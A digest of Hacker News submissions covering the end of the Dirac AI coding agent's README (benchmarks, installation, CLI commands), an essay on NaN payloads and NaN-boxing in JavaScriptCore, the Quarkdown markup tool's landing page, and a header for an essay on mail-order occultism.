| Task5 ([vscode](https://github.com/microsoft/vscode)) | 3 | 🔴 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_extensionswb_service_FAILURE) \[N/A] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_extensionswb_service) \[$0.71] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_extensionswb_service) \[$0.43] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_extensionswb_service) \[$0.53] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_extensionswb_service) \[$0.50] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_extensionswb_service) \[$0.36] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_extensionswb_service) \[$0.17]** |
| Task6 ([transformers](https://github.com/huggingface/transformers)) | 25 | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_latency) \[$0.87] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_latency_WRONG) \[$1.51] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_latency) \[$0.94] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_latency) \[$0.90] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_latency) \[$0.52] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_latency) \[$1.44] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_latency) \[$0.34]** |
| Task7 ([vscode](https://github.com/microsoft/vscode)) | 13 | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_sendRequest_2missing) \[$0.51] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_sendRequest) \[$0.77] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_sendRequest) \[$0.74] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_sendRequest) \[$0.67] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_sendRequest) \[$0.45] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_sendRequest) \[$1.05] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_sendRequest) \[$0.25]** |
| Task8 ([transformers](https://github.com/huggingface/transformers)) | 3 | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_stoppingcriteria) \[$0.25] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_stoppingcriteria) \[$0.19] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_code_refactor_stoppingcriteria) \[$0.17] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_stoppingcriteria) \[$0.26] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_code_refactor_stoppingcriteria) \[$0.23] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_stoppingcriteria) \[$0.29] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_stoppingcriteria) \[$0.12]** |
| **Total Correct** | | 5/8 | 5/8 | 6/8 | 8/8 | 6/8 | 6/8 | **8/8** |
| **Avg Cost** | | $0.49 | $0.73 | $0.51 | $0.44 | $0.38 | $0.60 | **$0.18** |

> 🟢 Success | 🟡 Incomplete | 🔴 Failure

> **Cost Comparison**: Dirac is **64.8% cheaper** than the competition (a **2.8x** cost reduction).
> 
> * Expected number of files to be modified/created to complete the task.
> 
> See [evals/README.md](https://github.com/dirac-run/dirac/blob/master/evals/README.md) for detailed task descriptions and methodology.

## 🚀 Key Features


- **Hash-Anchored Edits**: Dirac uses stable line hashes to target edits with extreme precision, avoiding the "lost in translation" issues of traditional line-number based editing. [![Hash-Anchored Edits](https://camo.githubusercontent.com/7c2146782e5ad29e647e51a95f9290c4e5eba1214d0a736d571de7f55cf7a98b/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c7469706c655f656469742e706e67)](https://camo.githubusercontent.com/7c2146782e5ad29e647e51a95f9290c4e5eba1214d0a736d571de7f55cf7a98b/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c7469706c655f656469742e706e67)
- **AST-Native Precision**: Built-in understanding of language syntax (TypeScript, Python, C++, etc.) allows Dirac to perform structural manipulations like function extraction or class refactoring with 100% accuracy. [![AST-Native Precision](https://camo.githubusercontent.com/37d1ad7e29ec1d50a714d80c7d60cf27efbf61514c449b48a0e0948245792a92/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f706172616c6c656c5f4153545f656469742e706e67)](https://camo.githubusercontent.com/37d1ad7e29ec1d50a714d80c7d60cf27efbf61514c449b48a0e0948245792a92/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f706172616c6c656c5f4153545f656469742e706e67)
- **Multi-File Batching**: Dirac can process and edit multiple files in a single LLM roundtrip, significantly reducing latency and API costs. [![Multi-File Batching](https://camo.githubusercontent.com/17195a2ee334a899e41d17267152feae6df9bb8459a4fac440f063206c4e7ede/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c74695f66756e6374696f6e5f726561642e706e67)](https://camo.githubusercontent.com/17195a2ee334a899e41d17267152feae6df9bb8459a4fac440f063206c4e7ede/68747470733a2f2f7777772e64697261632e72756e2f7374617469632f696d616765732f6d756c74695f66756e6374696f6e5f726561642e706e67)
- **High-Bandwidth Context**: Optimized context curation keeps the agent lean and fast, ensuring the LLM always has the most relevant information without wasting tokens.
- **Autonomous Tool Use**: Dirac can read/write files, execute terminal commands, use a headless browser, and more - all while keeping you in control with an approval-based workflow.
- **Skills & AGENTS.md**: Customize Dirac's behavior with project-specific instructions using `AGENTS.md` files. It also seamlessly picks up Claude's skills by automatically reading from `.ai`, `.claude`, and `.agents` directories.
- **Native Tool Calling Only**: To ensure maximum reliability and performance, Dirac exclusively supports models with native tool calling enabled. (Note: MCP is not supported).

## 📦 Installation


### VS Code Extension


Install Dirac from the [VS Code Marketplace](https://marketplace.visualstudio.com/items?itemName=dirac-run.dirac).

### CLI (Terminal)


Install the Dirac CLI globally using npm:

```
npm install -g dirac-cli
```

## 🚀 CLI Quick Start


1. **Authenticate**:
   
   ```
   dirac auth
   ```
2. **Run your first task**:
   
   ```
   dirac "Analyze the architecture of this project"
   ```

### Configuration (Environment Variables)


You can provide API keys via environment variables to skip the `dirac auth` step. This is ideal for CI/CD or non-persistent environments:

- `ANTHROPIC_API_KEY`
- `OPENAI_API_KEY`
- `OPENROUTER_API_KEY`
- `GEMINI_API_KEY`
- `GROQ_API_KEY`
- `MISTRAL_API_KEY`
- `XAI_API_KEY` (x.ai)
- `HF_TOKEN` (HuggingFace)
- ... and others (see `src/shared/storage/env-config.ts` for the full list).

### Common Commands


- `dirac "prompt"`: Start an interactive task.
- `dirac -p "prompt"`: Run in **Plan Mode** to see the strategy before executing.
- `dirac -y "prompt"`: **Yolo Mode** (auto-approve all actions, great for simple fixes).
- `git diff | dirac "Review these changes"`: Pipe context directly into Dirac.
- `dirac history`: View and resume previous tasks.

## 🛠️ Getting Started


1. Open the Dirac sidebar in VS Code.
2. Configure your preferred AI provider (Anthropic, OpenAI, OpenRouter, etc.).
3. Start a new task by describing what you want to build or fix.
4. Watch Dirac go!

## 📈 Star History


[![Star History Chart](https://camo.githubusercontent.com/9d2406a6f4e7ca4b176f80752b4bc65c6e46eb87e8e467bca36e43785a542736/68747470733a2f2f6170692e737461722d686973746f72792e636f6d2f7376673f7265706f733d64697261632d72756e2f646972616326747970653d44617465)](https://star-history.com/#dirac-run/dirac&Date)

## 📄 License


Dirac is **open source** and licensed under the [Apache License 2.0](https://github.com/dirac-run/dirac/blob/master/LICENSE).

## 🤝 Acknowledgments


Dirac is a fork of the excellent [Cline](https://github.com/cline/cline) project. We are grateful to the Cline team and contributors for their foundational work.

* * *

Built with ❤️ by [Max Trivedi](https://www.linkedin.com/in/max-trivedi-49993aab/) at [Dirac Delta Labs](https://dirac.run)

---

## [HN-TITLE] 28. The Secret Life of NaN (2018)

- **Source**: [https://anniecherkaev.com/the-secret-life-of-nan](https://anniecherkaev.com/the-secret-life-of-nan)
- **Site**: anniecherkaev.com
- **Submitter**: prakashqwerty (Hacker News)
- **Submitted**: 2026-04-26 10:56 UTC (Hacker News)
- **HN activity**: 35 points · [19 comments](https://news.ycombinator.com/item?id=47909252)
- **Length**: 2.9K words (~13 min read)

The floating point standard defines a special value called Not-a-Number (NaN) which is used to represent, well, values that aren’t numbers. Double precision NaNs come with a payload of 51 bits which can be used for whatever you want– one especially fun hack is using the payload to represent *all other* non-floating point values and their types at runtime in dynamically typed languages.

%%%%%% update (04/2019) %%%%%%

I gave a lightning talk about the secret life of NaN at !!con West 2019– it has fewer details, but more jokes; you can find a recording [here](https://www.youtube.com/watch?v=3jddE24Ep54).

%%%%%%%%%%%%%%%%%%%%%%%

When I say “NaN” and also “floating point”, I specifically mean the representations defined in [IEEE 754-2008](http://eng.umb.edu/~cuckov/classes/engin341/Reference/IEEE754.pdf), the ubiquitous floating point standard. This standard was born in 1985 ([with much drama!](https://people.eecs.berkeley.edu/~wkahan/ieee754status/754story.html)) out of a need for a canonical representation which would allow code to be portable by quelling the anarchy induced by the menagerie of inconsistent floating point representations used by different processors.

Floating point values are a discrete logarithmic-ish approximation to real numbers; below is a visualization of the points defined by a toy floating-point-like representation with 3 bits of exponent and 3 bits of mantissa (the image is from the paper [“How do you compute the midpoint of an interval?”](https://hal.archives-ouvertes.fr/file/index/docid/576641/filename/computing-midpoint.pdf), which points out arithmetic artifacts that commonly show up in midpoint computations).

![](https://anniecherkaev.com/images/floating_point_density.jpg)

Since the NaN I’m talking about doesn’t exist outside of IEEE 754-2008, let’s briefly take a look at the spec.

### An extremely brief overview of IEEE 754-2008

The standard defines these logarithmic-ish distributions of values with base-2 and base-10. For base-2, the standard defines representations at every power-of-two bit-width from 16 bits to 256 bits; for base-10, at every power-of-two bit-width from 32 bits to 128 bits. (Well, almost; for the exact details see [page 13 of the spec](http://eng.umb.edu/~cuckov/classes/engin341/Reference/IEEE754.pdf).) These are the only standardized bit-widths, meaning that if a processor supports 32-bit floating point values, it’s *highly* likely to support them in the standard-compliant representation.

Speaking of which, let’s take a look at what the standard compliant representation is. Let’s look at binary16, the base-2 16 bit wide format:

```
1 sign bit | 5 exponent bits | 10 mantissa bits
S            E E E E E         M M M M M M M M M M
```

I won’t explain how these are used to represent numeric values because I’ve got different fish to fry, but if you do want an explanation, I quite like [these](http://sandbox.mc.edu/~bennet/cs110/flt/index.html) nice walkthroughs.

Briefly, though, here are some examples: the take-away is you can use these 16 bits to encode a variety of values.

```
0 01111 0000000000 = 1
0 00000 0000000000 = +0
1 00000 0000000000 = -0
1 01101 0101010101 = -0.333251953125
```

Cool, so we can represent some finite, discrete collection of real numbers. That’s what you want from your numeric representation most of the time.
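These bit patterns are easy to check for yourself. As a quick aside (my example, not the article’s), Python’s `struct` module understands the binary16 format via its `'e'` format code:

```python
import struct

def half_to_float(bits: int) -> float:
    """Interpret a 16-bit pattern as an IEEE 754 binary16 value."""
    return struct.unpack(">e", bits.to_bytes(2, "big"))[0]

# The same examples as above, written as binary literals
# (sign | exponent | mantissa):
print(half_to_float(0b0_01111_0000000000))  # 1.0
print(half_to_float(0b0_00000_0000000000))  # 0.0
print(half_to_float(0b1_00000_0000000000))  # -0.0
print(half_to_float(0b1_01101_0101010101))  # -0.333251953125
```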

More interestingly, though, the standard also defines some special values: ±infinity, and “quiet” & “signaling” NaN. ±infinity are self-explanatory overflow behaviors: in the visualization above, ±15 are the largest magnitude values which can be precisely represented, and computations with values whose magnitudes are larger than 15 may overflow to ±infinity. The spec provides guidance on when operations should return ±infinity based on different rounding modes.

### What IEEE 754-2008 says about NaNs

First of all, let’s see how NaNs are represented, and then we’ll straighten out this “quiet” vs “signaling” business.

The standard reads (page 35, §6.2.1)

> All binary NaN bit strings have all the bits of the biased exponent field E set to 1 (see 3.4). A quiet NaN bit string should be encoded with the first bit (d1) of the trailing significand field T being 1. A signaling NaN bit string should be encoded with the first bit of the trailing significand field being 0.

For example, in the binary16 format, NaNs are specified by the bit patterns:

```
s 11111 1xxxxxxxxxx = quiet     (qNaN)
s 11111 0xxxxxxxxxx = signaling (sNaN) **
```

Notice that this is a large collection of bit patterns! Even ignoring the sign bit, there are 2^(number of mantissa bits - 1) bit patterns which *all* encode a NaN! We’ll refer to these leftover bits as the payload. \*\*: a slight complication: in the sNaN case, at least one of the mantissa bits must be set; it cannot have an all-zero payload, because the bit pattern with a fully set exponent and fully zeroed-out mantissa encodes infinity.

It seems strange to me that the bit which signifies whether or not the NaN is signaling is the top bit of the mantissa rather than the sign bit; perhaps something about how floating point pipelines are implemented makes it less natural to use the sign bit to decide whether or not to raise a signal.

Modern commodity hardware commonly uses 64 bit floats; the double-precision format has 52 bits for the mantissa, which means there are 51 bits available for the payload.
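To make that concrete, here is a small Python sketch (mine, not from the spec) that plants an arbitrary value in the 51 payload bits of a double-precision quiet NaN and reads it back; `struct` converts between the float and its raw bit pattern without disturbing it:

```python
import math
import struct

QNAN = 0x7FF8_0000_0000_0000   # exponent all ones + quiet bit set
PAYLOAD_MASK = (1 << 51) - 1   # the 51 bits below the quiet bit

def make_qnan(payload: int) -> float:
    """Build a quiet NaN carrying the given 51-bit payload."""
    assert 0 <= payload <= PAYLOAD_MASK
    return struct.unpack(">d", struct.pack(">Q", QNAN | payload))[0]

def read_payload(x: float) -> int:
    """Recover the payload bits from a NaN's raw representation."""
    return struct.unpack(">Q", struct.pack(">d", x))[0] & PAYLOAD_MASK

nan = make_qnan(0xDEADBEEF)
print(math.isnan(nan))         # True
print(hex(read_payload(nan)))  # 0xdeadbeef
```

Note that the payload survives here because `struct` copies bits directly; as the spec’s “should” language suggests, arithmetic operations are merely encouraged, not required, to preserve it.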

Okay, now let’s see the difference between “quiet” and “signaling” NaNs (page 34, §6.2):

> Signaling NaNs afford representations for uninitialized variables and arithmetic-like enhancements (such as complex-affine infinities or extremely wide range) that are not in the scope of this standard. Quiet NaNs should, by means left to the implementer’s discretion, afford retrospective diagnostic information inherited from invalid or unavailable data and results. To facilitate propagation of diagnostic information contained in NaNs, as much of that information as possible should be preserved in NaN results of operations.
> 
> Under default exception handling, any operation signaling an invalid operation exception and for which a floating-point result is to be delivered shall deliver a quiet NaN.

So “signaling” NaNs may raise an exception; the standard is agnostic to whether floating point is implemented in hardware or software so it doesn’t really say what this exception is. In hardware this might translate to the floating point unit setting an exception flag, or for instance, the C standard [defines and requires](http://pubs.opengroup.org/onlinepubs/009696699/basedefs/signal.h.html) the `SIGFPE` signal to represent floating point computational exceptions.

So, that last quoted sentence says that an operation which receives a signaling NaN can raise the alarm, then quiet the NaN and propagate it along. Why might an operation receive a signaling NaN? Well, that’s what the first quoted sentence explains: you might want to represent uninitialized variables with a signaling NaN so that if anyone ever tries to perform an operation on that value (without having first initialized it) they will be signaled that that was likely not what they wanted to do.

Conversely, “quiet” NaNs are your garden variety NaN– qNaNs are what are produced when the result of an operation is genuinely not a number, like attempting to take the square root of a negative number. The really valuable thing to notice here is the sentence:

> To facilitate propagation of diagnostic information contained in NaNs, as much of that information as possible should be preserved in NaN results of operations.

This means the official suggestion in the floating point standard is to leave a qNaN exactly as you found it, in case someone is using it to propagate “diagnostic information” via that payload we saw above. Is this an invitation to jerry-rig extra information into NaNs? You bet it is!

### What can we do with the payload?

This is really the question I’m interested in; or, rather, the slight refinement: what *have* people done with the payload?

The most satisfying answer that I found to this question is, people have used the NaN payload to pass around data & type information in dynamically typed languages, including implementations in Lua and JavaScript. Why dynamically typed languages? Because if your language is dynamically typed, then the type of a variable can change at runtime, which means you absolutely must also pass around some type information; the NaN payload is an opportunity to store both that type information and the actual value. We’ll take a look at one of these implementations in detail in just a moment.

I tried to track down other uses but didn’t find much else; [this textbook](https://koclab.cs.ucsb.edu/teaching/cs16/docx/FloatingPointNumbers.pdf) has some suggestions (page 86):

> One possibility might be to use NaNs as symbols in a symbolic expression parser. Another would be to use NaNs as missing data values and the payload to indicate a source for the missing data or its class.

The author probably had something specific in mind, but I couldn’t track down any implementations which used NaN payloads for symbols or a source indication for missing data. If anyone knows of other uses of the NaN payload in the wild, I’d love to hear about them!

Okay, let’s look at how JavaScriptCore uses the payload to store type information:

## Payload in Practice! A look at JavaScriptCore

We’re going to look at an implementation of a technique called NaN-boxing. Under NaN-boxing, all values in the language & their type tags are represented in 64 bits! Valid double-precision floats are left to their IEEE 754 representations, but all of that leftover space in the payload of NaNs is used to store *every other value* in the language, as well as a tag to signify what the type of the payload is. It’s as if instead of saying “not a number” we’re saying “not a double-precision float, but rather a <some other type>”.

We’re going to look at how JavaScriptCore (JSC) uses NaN-boxing, but JSC isn’t the only real-world industry-grade implementation that stores other types in NaNs. For example, [Mozilla’s](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey/Internals) [SpiderMonkey](http://www.redditmirror.cc/cache/websites/blog.mozilla.com_cwn0q/blog.mozilla.com/rob-sayre/2010/08/02/mozillas-new-javascript-value-representation/index.html) JavaScript implementation also uses NaN-boxing (which they call nun-boxing & pun-boxing), as does [LuaJIT](http://lua-users.org/lists/lua-l/2009-11/msg00089.html), which they call NaN-tagging. The reason I want to look at JSC’s code is it has a really great comment explaining their implementation.

JSC is the JavaScript implementation that powers WebKit, which runs Safari and Adobe’s Creative Suite. As far as I can tell, the code we’re going to look at is actually currently being used in Safari- as of March 2018, the file had last been modified 18 days ago.

[Here](https://github.com/WebKit/webkit/blob/23f2af82553c2cee7bae08392f2e9ba6e8c9e0c0/Source/JavaScriptCore/runtime/JSCJSValue.h#L362-L410) is the file we’re going to look at. The way NaN-boxing works is when you have non-float datatypes (pointers, integers, booleans) you store them in the payload, and use the top bits to encode the type of the payload. In the case of double-precision floats, we have 51 bits of payload which means we can store anything that fits in those 51 bits. Notably we can store 32 bit integers, and 48 bit pointers [(the current x86-64 pointer bit-width)](https://nikic.github.io/2012/02/02/Pointer-magic-for-efficient-dynamic-value-representations.html). This means that we can store every value in the language in 64 bits.

**Sidenote:** according to the [ECMAScript standard](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures), JavaScript doesn’t have a primitive integer datatype: it’s all double-precision floats. So why would a JS implementation want to represent integers? One good reason is integer operations are *so much faster* in hardware, and many of the numeric values used in programs really *are* ints. A notable example is an index variable in a for-loop which walks over an array. [Also according to the ECMAScript spec](https://www.ecma-international.org/publications/files/ECMA-ST/Ecma-262.pdf), arrays can have at most 2^32 - 1 elements, so it is actually safe to store array index variables as 32-bit ints in NaN payloads.

The encoding they use is:

```
 * The top 16-bits denote the type of the encoded JSValue:
 *
 *     Pointer {  0000:PPPP:PPPP:PPPP
 *              / 0001:****:****:****
 *     Double  {         ...
 *              \ FFFE:****:****:****
 *     Integer {  FFFF:0000:IIII:IIII
 *
 * The scheme we have implemented encodes double precision values by performing a
 * 64-bit integer addition of the value 2^48 to the number. After this manipulation
 * no encoded double-precision value will begin with the pattern 0x0000 or 0xFFFF.
 * Values must be decoded by reversing this operation before subsequent floating point
 * operations may be peformed.
```

So this comment explains that different value ranges are used to represent different types of objects. But notice that these bit-ranges don’t match those defined in IEEE-754; for instance, in the standard for double precision values:

```
a valid qNaN:
1 sign bit | 11 exponent bits | 52 mantissa bits
1 | 1 1 1 1 1 1 1 1 1 1 1 | 1 + {51 bits of payload}

chunked into bytes this is:
1 1 1 1 | 1 1 1 1 | 1 1 1 1 | 1 + {51 bits of payload}

which represents all the bit patterns in the range:
0x F F F F ...
to
0x F F F 8 ...
```

This means that according to the standard, the bit-ranges usually represented by valid doubles vs. qNaNs are:

```
         / 0000:****:****:****
Double  {        ...
         \ FFF7:****:****:****
         / FFF8:****:****:****
qNaN    {        ...
         \ FFFF:****:****:****
```

So what the comment in the code is showing us is that the ranges they’re representing are *shifted* from what’s defined in the standard. The reason they’re doing this is to favor pointers: because pointers occupy the range with the top two bytes zeroed, you can manipulate pointers without applying a mask. The effect is that pointers aren’t “boxed”, while all other values are. This choice to favor pointers isn’t obvious; the [SpiderMonkey implementation](https://github.com/ricardoquesada/Spidermonkey/blob/4a75ea2543408bd1b2c515aa95901523eeef7858/js/src/gdb/mozilla/jsval.py#L119) doesn’t shift the range, thus favoring doubles.

Okay, so I think the easiest way to see what’s up with this range shifting business is by looking at the offset defined lower down in that file:

```
// This value is 2^48, used to encode doubles such that the encoded value will begin
// with a 16-bit pattern within the range 0x0001..0xFFFE.
#define DoubleEncodeOffset 0x1000000000000ll
```

This offset is [used](https://github.com/WebKit/webkit/blob/dd7199d7f8f417992f60c9f1514e4b548ec923fb/Source/JavaScriptCore/runtime/JSCJSValueInlines.h#L514) in the `asDouble()` function:

```
inline double JSValue::asDouble() const
{
    ASSERT(isDouble());
    return reinterpretInt64ToDouble(u.asInt64 - DoubleEncodeOffset);
}
```

This shifts the encoded double into the normal range of bit patterns defined by the standard. Conversely, the `asCell()` function (I believe in JSC “cells” and “pointers” are roughly interchangeable terms) can just grab the pointer directly without shifting:

```
ALWAYS_INLINE JSCell* JSValue::asCell() const
{
    ASSERT(isCell());
    return u.ptr;
}
```

Cool. That’s actually basically it. Below I’ll mention a few more fun tidbits from the JSC implementation, but this is really the heart of the NaN-boxing implementation.
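The whole scheme is compact enough to sketch in a few lines of Python (a toy restatement of the idea, not JSC’s actual code): doubles are shifted up by 2^48 so their top 16 bits land in 0x0001..0xFFFE, the 0xFFFF prefix tags 32-bit integers, and the 0x0000 prefix leaves pointers unboxed:

```python
import struct

DOUBLE_ENCODE_OFFSET = 1 << 48    # JSC's DoubleEncodeOffset
INT_TAG = 0xFFFF_0000_0000_0000   # top 16 bits all ones => int32
U64_MASK = (1 << 64) - 1

def float_to_bits(x: float) -> int:
    return struct.unpack(">Q", struct.pack(">d", x))[0]

def bits_to_float(b: int) -> float:
    return struct.unpack(">d", struct.pack(">Q", b))[0]

def encode_double(x: float) -> int:
    # Shift the raw bit pattern so no encoded double starts with 0x0000 or 0xFFFF.
    return (float_to_bits(x) + DOUBLE_ENCODE_OFFSET) & U64_MASK

def decode_double(v: int) -> float:
    # The inverse shift, analogous to JSC's asDouble().
    return bits_to_float(v - DOUBLE_ENCODE_OFFSET)

def encode_int32(i: int) -> int:
    # Tag the low 32 bits with the all-ones prefix.
    return INT_TAG | (i & 0xFFFF_FFFF)

v = encode_double(3.14)
assert v >> 48 not in (0x0000, 0xFFFF)   # can't be mistaken for a pointer or int
print(decode_double(v))                  # 3.14
print(hex(encode_int32(7)))              # 0xffff000000000007
```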

### What about all the *other* values?

The part of the comment that said that if the top two bytes are 0, then the payload is a pointer was lying. Or, okay, over-simplified. JSC reserves specific, invalid, pointer values to denote immediates required by the ECMAScript standard: boolean, undefined & null:

```
 *     False:     0x06
 *     True:      0x07
 *     Undefined: 0x0a
 *     Null:      0x02
```

These all have the second bit set to make it easy to test whether the value is any of these immediates.

They also represent two immediates not required by the standard: `ValueEmpty` at 0x00, which is used to represent holes in arrays, & `ValueDeleted` at 0x04, which is used to mark deleted values.

And finally, they also represent pointers into [Wasm](http://webassembly.org/) at 0x03.

So, putting it all together, a complete picture of the bit pattern encodings in JSC is:

```
 *     ValEmpty  {  0000:0000:0000:0000
 *     Null      {  0000:0000:0000:0002
 *     Wasm      {  0000:0000:0000:0003
 *     ValDeltd  {  0000:0000:0000:0004
 *     False     {  0000:0000:0000:0006
 *     True      {  0000:0000:0000:0007
 *     Undefined {  0000:0000:0000:000a
 *     Pointer   {  0000:PPPP:PPPP:PPPP
 *                / 0001:****:****:****
 *     Double    {         ...
 *                \ FFFE:****:****:****
 *     Integer   {  FFFF:0000:IIII:IIII
```

## Take-Aways

1. The floating point spec leaves a *lot* of room for NaN payloads. It does this intentionally.
2. What are these payloads used for in real life? Mostly, I don’t know what they’re used for. If you know of other real world uses, I’d love to hear from you.
3. One use is NaN-boxing, which is where you stick all the other non-floating point values in a language + their type information into the payload of NaNs. It’s a beautiful hack.

* * *

### Appendix: to NaNbox or not to NaNbox

Looking at this implementation raises the question: is NaN-boxing a good idea or a bizarro hack? As someone who isn’t implementing or maintaining a dynamically typed language, I’m not well-posed to answer that question. There are [a lot of different approaches](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.39.4394&rep=rep1&type=pdf) which surely all have nuanced tradeoffs that show up depending on the use-cases of your language. With that caveat, here’s a rough sketch of the pros and cons. Pros: it saves memory, all values fit in registers, and bit masks are fast to apply. Cons: almost all values have to be boxed and unboxed, the implementation becomes harder, and validation bugs can be serious security vulnerabilities.

For a better discussion of NaN-boxing tradeoffs from someone who does implement & maintain a dynamically typed language check out [this article](https://wingolog.org/archives/2011/05/18/value-representation-in-javascript-implementations).

Apart from performance, there is [this writeup](http://www.phrack.org/papers/attacking_javascript_engines.html) and [this other writeup](https://blog.xyz.is/2016/webkit-360.html) of vulnerabilities discovered in JSC. Whether these vulnerabilities would have been preventable if JSC had used a different approach for storing type information is a moot point, but there is at least one vulnerability that seems like it would have been prevented:

> This way we control all 8 bytes of the structure, but there are other limitations (Some floating-point normalization crap does not allow for truly arbitrary values to be written. Otherwise, you would be able to craft a CellTag and set pointer to an arbitrary value, that would be horrible. Interestingly, before it did allow that, which is what the very first Vita WebKit exploit used! CVE-2010-1807).

If you want to know way more about JSC’s memory model there is also [this](https://webkit.org/blog/7846/concurrent-javascript-it-can-work/) very in depth article.

---

## [HN-TITLE] 29. Quarkdown – Markdown with Superpowers

- **Source**: [https://quarkdown.com/](https://quarkdown.com/)
- **Site**: quarkdown.com
- **Author**: Giorgio Garofalo
- **Submitted**: 2026-04-27 08:54 UTC (Hacker News)
- **HN activity**: 271 points · [98 comments](https://news.ycombinator.com/item?id=47919240)
- **Length**: 299 words (~2 min read)
- **Language**: en

No boilerplate

## Spend your time writing

and don't worry about the rest.

```
.docauthor {Jennifer Chu}

.pagemargin {topright}
    .docauthor | MIT News

# X-ray flashes from a supermassive black hole

!(70%)[Black hole](img/blackhole.jpg)

.abstract
    One supermassive black hole has kept astronomers glued to their scopes
    for the last several years.
    The black hole in question is `1ES 1927+654`, which is about as
    massive as a million suns and sits in a galaxy that is 270 million
    light-years away.
    In 2018, astronomers at MIT and elsewhere observed that the black
    hole’s corona — a cloud of whirling, white-hot plasma — suddenly
    **disappeared**, before reassembling months later.
    The brief though dramatic shut-off was a first in black hole astronomy.

> This would be the closest thing we know of around any black hole.
> - Megan Masterson, a graduate student in physics at MIT
```

![Rendered article about X-ray flashes from a supermassive black hole](https://quarkdown.com/_astro/no-boilerplate.SaDlAnd3_Z16VNJW.webp)

Batteries included

## Complete authoring experience

Write Markdown to reach flow state faster.  
Use Quarkdown's extensions to achieve more.

![First page of a scientific paper with title, abstract and introduction](https://quarkdown.com/_astro/authoring-1.DJIUc1nX_2dgAbU.webp) ![Second page of a scientific paper with formulas and a results table](https://quarkdown.com/_astro/authoring-2.DyZrIBu4_mKIrN.webp)

Versatile

## One tool to rule them all

Whether you are writing a research paper, a quick report, a company-wide wiki, class notes, or preparing interactive slides for your next talk, there's only one line you need.

Replaces

LaTeX, Typst

```
.doctype {paged}
```

![Paged document output showing a formatted article](https://quarkdown.com/_astro/doctype-paged.D0Cs-mnS_wI8x9.webp)

For articles, books and reports.

Replaces

Notion, Obsidian

```
.doctype {plain}
```

![Plain document output showing a coffee brewing guide](https://quarkdown.com/_astro/doctype-plain.DAkJSSiY_Z2vmo3C.webp)

For notes, knowledge bases and simple static websites.

Replaces

GitBook, Docusaurus, Material for MkDocs, VitePress

```
.doctype {docs}
```

![Documentation website output](https://quarkdown.com/_astro/doctype-docs.Bk9wAFWq_2jfet2.webp)

For wikis, technical documentation and large knowledge bases.

Replaces

Beamer (LaTeX), Google Slides

```
.doctype {slides}
```

![Slide presentation output](https://quarkdown.com/_astro/doctype-slides.CezSCHgD_Z1Sexql.webp)

For lectures, talks and interactive presentations.

Reactive preview

## Typesetting for the impatient

With blazing fast compilation and live preview, see results instantly as you type.

Turing complete

## Don't repeat yourself

Reuse your workflow thanks to powerful scripting capabilities.

```
.function {animal}
    name ecosystem picture:
    .row
        .clip {circle}
            .picture

        - **Name**: .name
        - **Ecosystem**: .ecosystem

.animal {Red panda} ecosystem:{Temperate forests}
    ![Red panda](img/red-panda.jpg)

.animal {Sea otter} ecosystem:{Kelp forests}
    ![Sea otter](img/sea-otter.jpg)

.animal {Clownfish} ecosystem:{Coral reefs}
    ![Clownfish](img/clownfish.jpg)
```

![Animal cards rendered from a custom function](https://quarkdown.com/_astro/scripting.B2wI0zk3_tF9cb.webp)

---

## [HN-TITLE] 30. Magic by return of post: How mail order delivered the occult

- **Source**: [https://publicdomainreview.org/essay/magic-by-return-of-post/](https://publicdomainreview.org/essay/magic-by-return-of-post/)
- **Site**: The Public Domain Review
- **Submitter**: Vigier (Hacker News)
- **Submitted**: 2026-04-25 21:17 UTC (Hacker News)
- **HN activity**: 42 points · [5 comments](https://news.ycombinator.com/item?id=47904615)
- **Length**: 3.7K words (~17 min read)
- **Language**: en


